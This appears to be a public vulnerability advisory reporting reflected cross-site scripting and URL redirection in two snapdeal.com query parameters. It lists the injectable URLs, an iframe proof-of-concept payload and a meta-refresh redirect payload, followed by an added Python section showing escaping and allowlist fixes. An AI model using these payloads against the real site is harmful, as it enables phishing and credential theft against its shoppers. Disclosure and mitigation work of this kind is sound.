Site: http://www.snapdeal.com
Threat/Vulnerability: Cross site scripting a.k.a XSS, URL Redirection
Severity : Moderate
Author: Karthik R a.k.a 3psil0nlambda
I have informed the owner (CEO) but got no response or acknowledgement of receipt of the mail.
About the Site:
India's fastest growing shopping site.
Vulnerability:
*XSS a.k.a Cross site scripting
*URL Redirection
Once the vulnerability is found, the following URLs can be used to mount attacks such as:
*Installing malware in the name of Snapdeal.com to gain credit card and other important credentials
*Phishing via URL redirection to gain login ID and password
URLs used for crafting attacks:
*http://www.snapdeal.com/search?categoryId=0&keyword= <inject XSS attack here> &vertical=all&clickSrc=go_recent&locId=0
*http://www.snapdeal.com/products/lifestyle-handbags-wallets?q=Brand:Jute Planet,A-maze&sort= <inject XSS attack here>
Exploit:
*XSS : "><IFRAME SRC="javascript:alert('XSS');"></IFRAME>
*URL Redirection: "><meta HTTP-EQUIV="REFRESH" content="0; url=EVIL URL">
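Both findings come from the same root cause: the keyword and sort query parameters are reflected into the page without output encoding, so a value that closes the surrounding attribute can inject an iframe or a meta refresh. The following Python is an added example, not code from the advisory or from Snapdeal; it assumes the parameters are reflected into an input element's value attribute (an assumption, the advisory does not say where they land) and contrasts that unsafe reflection with two standard mitigations: attribute-context HTML escaping for free-text keyword, and an allowlist for the enumerated sort parameter. The allowed sort values are made up for the example.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Payload strings quoted in the advisory, used here only as test input to show
# that the hardened renderers neutralise them.
XSS_PAYLOAD = '"><IFRAME SRC="javascript:alert(\'XSS\');"></IFRAME>'
REDIRECT_PAYLOAD = '"><meta HTTP-EQUIV="REFRESH" content="0; url=EVIL URL">'

# Assumed allowlist: sort is an enumerated parameter, so it never needs free text.
ALLOWED_SORT = {"relevance", "price_asc", "price_desc", "newest"}
DEFAULT_SORT = "relevance"


def render_keyword_vulnerable(keyword: str) -> str:
    """Reflects the raw parameter into an attribute: the defect class the advisory reports."""
    return f'<input name="keyword" value="{keyword}">'


def render_keyword_hardened(keyword: str) -> str:
    """Escapes for the HTML attribute context before reflecting (quote=True escapes " and ')."""
    return f'<input name="keyword" value="{html.escape(keyword, quote=True)}">'


def render_sort_hardened(sort: str) -> str:
    """Rejects any sort value outside the allowlist instead of trying to sanitise it."""
    if sort not in ALLOWED_SORT:
        sort = DEFAULT_SORT
    return f'<input type="hidden" name="sort" value="{sort}">'


def reflected_params(url: str) -> dict:
    """Extracts the first value of each query parameter from a request URL."""
    query = urlsplit(url).query
    return {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}


def reflects_unsafely(render, value: str) -> bool:
    """True if the rendered fragment contains more than the single intended tag.

    Each renderer above emits exactly one element, so any additional '<' means
    the reflected value broke out of the attribute and introduced markup.
    """
    return render(value).count("<") > 1


if __name__ == "__main__":
    # Constructed request URLs using the parameter names from the advisory.
    search_url = "http://www.snapdeal.com/search?categoryId=0&keyword=" + XSS_PAYLOAD
    params = reflected_params(search_url)
    print("vulnerable:", render_keyword_vulnerable(params["keyword"]))
    print("hardened:  ", render_keyword_hardened(params["keyword"]))
    print("sort:      ", render_sort_hardened(REDIRECT_PAYLOAD))
```

The escaping fix is context-specific: html.escape with quote=True is correct for a double-quoted attribute or element text, but a value reflected into a script block, a URL, or an unquoted attribute needs the encoder for that context. The allowlist for sort removes the question entirely, which is why enumerated parameters should be validated against a fixed set rather than encoded.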
Greetz to side-effects, r4dc0re, lord crusader, team inject0r